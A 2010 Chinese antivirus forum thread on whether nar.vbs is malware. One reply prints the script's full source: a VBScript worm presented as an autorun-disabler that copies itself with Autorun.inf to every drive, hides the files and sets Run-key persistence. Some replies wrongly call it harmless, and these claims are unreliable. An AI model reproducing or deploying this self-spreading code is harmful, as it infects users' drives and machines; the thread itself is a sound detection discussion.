1   1  /  1  页   跳转

[原创] nar.vbs是安全文件???

nar.vbs是安全文件???

查询编号:  校 验 码: *  
 
查询编号:RS20100101124232437673
文件名称:nar.rar
文件MD5:86D02B85300E0228B002BC5EB7F199EE
文件状态:压缩文件,包含1个文件
[tr=#ffffff]
文件名MD5状态病毒名称解决版本号
nar.vbsA45D0F681...安全文件
 
  • 网址/站名
  • 文件进程
  • 贴吧
  • 电脑问题
  • 论坛帖子
  • IP地址


MD5值查询工具下载 文件名 MD5           积分换好礼>>>

贴吧 帖子


全世界每天都会有新使用的IP段,因此有少数IP我们的数据仍可能查不到。



  热门关键字:杀毒软件打不开系统加固在线杀毒杀毒软件产品序列号错误


这是我上报瑞星后给的答复,非常不满意,文件见附件,大家给看看,当心中毒!!!。


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)

附件附件:

文件名:nar.rar
下载次数:224
文件类型:application/octet-stream
文件大小:
上传时间:2010-1-2 19:03:07
描述:rar

分享到:
gototop
 

回复: nar.vbs是安全文件???

看代码,我也认为不是病毒。。。

'--------------------------------------------------------------->
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1-------------------------------------------------------->
'--------------------------------------------------------------->
on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path

set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)


'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
shell.run(windir & "\explorer.exe /root," & nar_RunDir)
in_WinDir = 0
Else
in_WinDir = 1
End If

'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 32
set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File = fso.getfile(windir & "\Nar.vbs")
to_File.attributes = 39
End If

do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then

set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
to_File.write narsource
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
to_File.attributes = 39

set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 32
set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
to_File.write autorun
to_File.close
set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
to_File.attributes = 39
End If
next

'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"

'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop

'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
temp = windir&"\nar.vbs"
shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"




gototop
 

回复:nar.vbs是安全文件???

不是病毒、
gototop
 

回复:nar.vbs是安全文件???

看来是有点问题,这个文件是在别人U盘上先见到的,后来在自己的U盘上也见到了,再后来在电脑里也发现,在每个盘符下均有一个,并且在C:windows文件下也有一个,删不掉,上报瑞星时,不压缩直接显示是病毒,压缩后确是安全文件
gototop
 

回复:nar.vbs是安全文件???

这是我用其他软件查的,在360里都说是病毒,瑞星还是安全文件!!
名称:AutoRuns        类别:可疑启动项

文件路径:C:\WINDOWS\nar.vbs

修复情况:禁止自启动

注册表路径:SOFTWARE\Microsoft\Windows\CurrentVersion\Run

注册表的项名:nar

服务器安全级别: 0判断级别: 0
名称:AutoRuns        类别:可疑启动项

文件路径:C:\WINDOWS\nar.vbs

修复情况:禁止自启动

注册表路径:SOFTWARE\Microsoft\Windows\CurrentVersion\Run

注册表的项名:nar

服务器安全级别: 0判断级别: 0


再有这个程序与Wscript.exe进程有关。
最后编辑stao112 最后编辑于 2010-01-03 15:13:50
gototop
 

回复:nar.vbs是安全文件???

请楼主升级瑞星杀毒软件至病毒库:22.29.00.03已经可以查杀。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT